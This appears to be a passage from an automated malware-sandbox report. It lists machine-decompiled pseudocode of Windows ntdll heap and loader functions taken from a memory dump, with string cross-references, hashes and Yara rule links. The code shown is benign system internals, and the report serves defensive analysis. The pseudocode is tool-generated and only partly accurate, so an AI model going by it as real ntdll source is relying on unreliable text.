					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E01B8D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E01B5AB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E01BFA80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E01BFA80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x1c28748 - 1;
					if( *0x1c28748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E01B3B150();
							} else {
								E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E01B3B150();
							__eflags =  *0x1c27bc8;
							if(__eflags == 0) {
								_t131 = E01BF2073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}

0x01b5a83a
0x01b5a83c
0x01b5a83e
0x01b5a841
0x01b5a844
0x01b5a84a
0x01b5aa53
0x01b5aa59
0x01b5aa59
0x01b5a858
0x01b5a85e
0x01b5aaf5
0x01b5aafc
0x01ba229e
0x01ba22a2
0x01ba22a8
0x01ba22b3
0x01ba22b5
0x01ba22bb
0x01ba22c1
0x01ba22c5
0x01ba22e6
0x01ba22eb
0x01ba22f0
0x01ba22c7
0x01ba22dc
0x01ba22e1
0x01ba22e1
0x01ba22f3
0x01ba22f8
0x01ba22fd
0x01ba2300
0x01ba2307
0x01ba230e
0x01ba230e
0x01ba2313
0x01ba2313
0x01ba22b5
0x01ba22a2
0x01b5aafc
0x01b5a864
0x01b5a869
0x01b5aa5c
0x01b5aa5e
0x01b5a86f
0x01b5a87f
0x01b5a885
0x01b5a885
0x01b5a88b
0x01b5a890
0x01b5a896
0x01b5ab0c
0x01b5ab0f
0x01b5ab15
0x01ba2320
0x01ba2320
0x01b5ab1b
0x01b5a89c
0x01b5a89f
0x01b5a8a2
0x01b5a8a2
0x01b5a8a5
0x01b5a8af
0x01b5a8b3
0x01b5a8b8
0x01b5aa66
0x01b5a8be
0x01b5a8c5
0x01b5a8c6
0x01b5a8ce
0x01ba2328
0x01ba2332
0x01ba2337
0x01ba2337
0x01b5a8ce
0x01b5a8d4
0x01b5a8d8
0x01b5a8db
0x01b5a8de
0x01b5a8e1
0x01b5a8e5
0x01b5a8e8
0x01b5a8f0
0x01b5a8f3
0x01ba234c
0x01ba2350
0x01ba2355
0x01ba2359
0x01ba2359
0x01b5a8f9
0x01b5a901
0x01b5aae4
0x01b5aae4
0x01b5aaea
0x00000000
0x01b5a907
0x01b5a90a
0x01b5a91d
0x01b5a91d
0x00000000
0x01b5a910
0x01b5a910
0x01b5a910
0x01b5a914
0x01b5a924
0x01b5a924
0x01b5a924
0x01b5a924
0x01b5a916
0x01b5a91b
0x00000000
0x00000000
0x00000000
0x01b5a91b
0x01b5a925
0x01b5a925
0x01b5a932
0x01b5a936
0x01b5a93c
0x01b5a93c
0x01b5a93c
0x01b5ab22
0x01b5ab24
0x01b5ab27
0x01b5ab27
0x01b5a942
0x01b5a944
0x01b5aaba
0x01b5aabd
0x01b5aac0
0x01b5aac0
0x01b5aac2
0x01b5ab2f
0x01b5aac4
0x01b5aac4
0x01b5aac7
0x01b5aaca
0x01b5aacc
0x01b5aace
0x01b5aace
0x01b5aace
0x01b5aad1
0x01b5aad1
0x01b5aad7
0x01b5aad9
0x00000000
0x00000000
0x01ba2361
0x01ba2369
0x01ba236b
0x00000000
0x01ba2371
0x00000000
0x01ba2371
0x00000000
0x01ba236b
0x01b5aac0
0x01b5a94a
0x01b5a94a
0x01b5a94d
0x01b5a94d
0x01b5a950
0x01b5a954
0x01ba2376
0x01ba2380
0x01b5a95a
0x01b5a95a
0x01b5a95c
0x01b5a95f
0x01b5a961
0x01b5a961
0x01b5a967
0x01b5a96a
0x01b5a972
0x01b5aa02
0x01b5aa06
0x01b5aa10
0x01b5aa16
0x01b5aa16
0x01b5aa1b
0x01b5aa21
0x01b5aa24
0x01b5aa27
0x01b5aa29
0x01b5aa2c
0x01b5aa32
0x00000000
0x00000000
0x00000000
0x00000000
0x01b5a978
0x01b5a978
0x01b5a97b
0x01b5a981
0x01b5a996
0x01b5a998
0x01b5a99f
0x01b5a9a2
0x01ba238a
0x01b5a9a8
0x01b5a9a8
0x01b5a9a8
0x01b5a9aa
0x01b5a9ad
0x01b5a9b0
0x01b5a9bb
0x01b5a9be
0x01b5a9c7
0x01b5a9c9
0x01b5a9c9
0x01b5a9cc
0x01b5a9d1
0x01b5aa6d
0x01b5aa70
0x01b5aa73
0x01b5aa75
0x01b5aa79
0x01b5aa7e
0x01b5aa82
0x01b5aa8f
0x01b5aa94
0x01b5aa96
0x01ba2392
0x01ba23a1
0x01ba23a1
0x01b5aa9c
0x01b5aa9f
0x01b5aaa2
0x01b5aaa2
0x01b5aaa8
0x01b5aaab
0x01b5aaaf
0x00000000
0x01b5aab5
0x00000000
0x01b5aab5
0x01b5a9d7
0x01b5a9d7
0x01b5a9da
0x01b5a9e0
0x01b5a9e3
0x01b5a9e6
0x01b5a9e9
0x01b5a9eb
0x01b5a9fd
0x01b5a9fd
0x00000000
0x01b5a9eb
0x00000000
0x00000000
0x00000000
0x01b5a983
0x01b5a983
0x01b5a983
0x01b5a987
0x01b5a995
0x01b5a995
0x01b5a995
0x01b5a995
0x01b5a989
0x01b5a98e
0x00000000
0x01b5a990
0x00000000
0x01b5a990
0x01b5a98e
0x00000000
0x01b5a983
0x01b5a972
0x01b5a90a
0x01b5aa34
0x01b5aa34
0x01b5aa40
0x01b5aa43
0x01b5aa46
0x01b5aa4d
0x01ba23ab
0x01ba23b2
0x01ba23b8
0x01ba23be
0x01ba23c3
0x01ba23c5
0x01ba23cb
0x01ba23d1
0x01ba23d5
0x01ba23f6
0x01ba23fb
0x01ba23d7
0x01ba23ec
0x01ba23f1
0x01ba2403
0x01ba2408
0x01ba2410
0x01ba2417
0x01ba2422
0x01ba2422
0x01ba2417
0x01ba23c5
0x01ba23b2
0x00000000

Strings

HEAP[%wZ]: , xrefs: 01BA22D7, 01BA23E7
ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01BA2403
HEAP: , xrefs: 01BA22E6, 01BA23F6
((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 01BA22F3

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: 5a0d90f42004cea2fbe76cbe0a65ae7d58cc9697dfbeab4bb82d577c4eace3cd
Instruction ID: c46e4bd5be7dc5ac15ddd36f2ad8c277d887be6dccf97cade61e90f9a5bb3c00
Opcode Fuzzy Hash: 5a0d90f42004cea2fbe76cbe0a65ae7d58cc9697dfbeab4bb82d577c4eace3cd
Instruction Fuzzy Hash: F6D1BE34A046468FDB5DCF68C590BBABBF1FF48300F1586E9D95AAB346E330A945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01B5A229, Relevance: 5.2, Strings: 4, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E01B5A229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E01B5DF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E01B79730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E01BFA80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E01B79660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E01B3B150();
					} else {
						E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E01B3B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E01B57D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E01BF138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E01B57D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E01B57D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E01BF1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E01B57D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E01B57D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E01BF1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E01B8D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}

0x01b5a229
0x01b5a231
0x01b5a23f
0x01b5a242
0x01b5a244
0x01b5a24c
0x01b5a255
0x01b5a25a
0x01b5a25f
0x01ba1c76
0x01ba1c78
0x01ba1c7e
0x01ba1c7f
0x01ba1c81
0x01ba1c82
0x01ba1c84
0x01ba1c89
0x01ba1c8b
0x01ba1c9e
0x01ba1c9e
0x01ba1cab
0x01ba1cb2
0x00000000
0x01ba1cb2
0x01ba1c8d
0x01ba1c92
0x00000000
0x00000000
0x01ba1c94
0x01ba1c98
0x00000000
0x00000000
0x00000000
0x01ba1c98
0x01b5a265
0x01b5a265
0x01b5a266
0x01b5a26f
0x01b5a270
0x01b5a276
0x01b5a277
0x01b5a279
0x01b5a27e
0x01b5a282
0x01ba1db5
0x01ba1dbb
0x01ba1dc1
0x01ba1dc5
0x01ba1de4
0x01ba1de9
0x01ba1dc7
0x01ba1ddc
0x01ba1de1
0x01ba1def
0x01ba1df3
0x01ba1df7
0x01ba1dfe
0x01ba1e06
0x01b5a302
0x01b5a308
0x01b5a308
0x01b5a288
0x01b5a28d
0x01b5a294
0x01ba1cc1
0x01b5a29a
0x01b5a29a
0x01b5a29a
0x01b5a29f
0x01ba1ccb
0x01ba1cd1
0x01ba1cd8
0x01ba1cea
0x01ba1cea
0x01ba1cd8
0x01b5a2a9
0x01b5a2af
0x01b5a2bc
0x01ba1cfd
0x01b5a2c2
0x01b5a2c2
0x01b5a2c2
0x01b5a2c7
0x01ba1d07
0x01ba1d0d
0x01ba1d14
0x01ba1d1f
0x01ba1d21
0x01ba1d2c
0x01ba1d2c
0x01ba1d2c
0x01ba1d47
0x01ba1d47
0x01ba1d14
0x01b5a2cd
0x01b5a2d2
0x01b5a2d9
0x01ba1d5a
0x01b5a2df
0x01b5a2df
0x01b5a2df
0x01b5a2e4
0x01ba1d69
0x01ba1d6b
0x01ba1d76
0x01ba1d76
0x01ba1d76
0x01ba1d91
0x01ba1d91
0x01b5a2ea
0x01b5a2f0
0x01b5a2f5
0x01ba1da8
0x01ba1dad
0x01ba1dad
0x01b5a2fd
0x01b5a300
0x00000000

Strings

HEAP[%wZ]: , xrefs: 01BA1DD7
HEAP: , xrefs: 01BA1DE4
`, xrefs: 01BA1C8D
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 01BA1DF9

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: 74032e3d8faee44ac840f53fb50a40581a332bf039fe7d3b26bf1b4cd476ac91
Instruction ID: 9ce2121cf3155b93785a81f11c632ec786e428e63d71aac2ca8b0c82ed2d0ed0
Opcode Fuzzy Hash: 74032e3d8faee44ac840f53fb50a40581a332bf039fe7d3b26bf1b4cd476ac91
Instruction Fuzzy Hash: DC5117322086819FD76AEB6CC845F677BE8FF80B50F0806E8F9959B291DB75D804C761

Uniqueness

Uniqueness Score: -1.00%

Function 01B68E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01B68E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x1c2d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1c28464; // 0x73b80110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1c25780 & 0x00000003) != 0) {
							E01BB5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1c25780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E01B7B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1c27984; // 0x16d2b78
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1c28464; // 0x73b80110
					 *0x1c2b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01B69B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1c25780 & 0x00000005) != 0) {
						_push(_t49);
						E01BB5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x01b68e0f
0x01b68e16
0x01b68e19
0x01b68e1b
0x01b68e21
0x01b68e7f
0x01b68e85
0x01ba9354
0x01ba936c
0x01ba9371
0x01ba937b
0x01ba9381
0x01ba9381
0x01ba937b
0x01b68e9d
0x01b68e9d
0x01b68e29
0x01b68e2c
0x01b68e38
0x01b68e3e
0x01b68e43
0x01b68eb5
0x01b68eb9
0x01ba92aa
0x01ba92af
0x01ba92e8
0x01ba92e8
0x01ba92af
0x01b68eb9
0x01b68e45
0x01b68e53
0x01b68e5b
0x01b68e5f
0x01b68e78
0x01b68e78
0x01b68e7d
0x01b68ec3
0x01b68ecd
0x01b68ed2
0x01b68ed2
0x01b68ec5
0x01b68ec5
0x00000000
0x01b68e7d
0x01b68e67
0x01b68ea4
0x01ba931a
0x00000000
0x00000000
0x01ba9320
0x01b68ea4
0x01b68e70
0x01ba9325
0x01ba9340
0x01ba9345
0x01ba9345
0x01b68e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

LdrpFindDllActivationContext, xrefs: 01BA9331, 01BA935D
minkernel\ntdll\ldrsnap.c, xrefs: 01BA933B, 01BA9367
Querying the active activation context failed with status 0x%08lx, xrefs: 01BA9357
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 01BA932A

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 56b0e1241928775a2eebd57c78d96c0d56d04eb2720de675f5dd9b0c81c9a24f
Instruction ID: 8ead80f6d07a3444b39ff5d97bdee54e032ade6d3fd58d29426095d66a2e0821
Opcode Fuzzy Hash: 56b0e1241928775a2eebd57c78d96c0d56d04eb2720de675f5dd9b0c81c9a24f
Instruction Fuzzy Hash: 4941F732A403159FDF3EAB1CCC89B76B6BCEB30654F4642E9E90957151E7B89D80C381

Uniqueness

Uniqueness Score: -1.00%

Function 01BF49A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01BF4A3D, 01BF4AB7
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 01BF4A61
HEAP: , xrefs: 01BF4A4A, 01BF4A5D, 01BF4A5F, 01BF4AC4
This is located in the %s field of the heap header., xrefs: 01BF4AD6

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: 5770b587061c205414409059f300e8d321f808a069ea1ec96e9cf3b25dbecbcb
Instruction ID: e6ccccb26cd284aaf7ce944c454adc347ce12cbce59c3af9d6a9034b34379f09
Opcode Fuzzy Hash: 5770b587061c205414409059f300e8d321f808a069ea1ec96e9cf3b25dbecbcb
Instruction Fuzzy Hash: ED310336210514EFD728DB6EC985F6B77A8EF04720F1541DEF6058B251E770A84CCB58

Uniqueness

Uniqueness Score: -1.00%

Function 01B599BF, Relevance: 4.3, Strings: 3, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E01B599BF(void* __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				void* _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
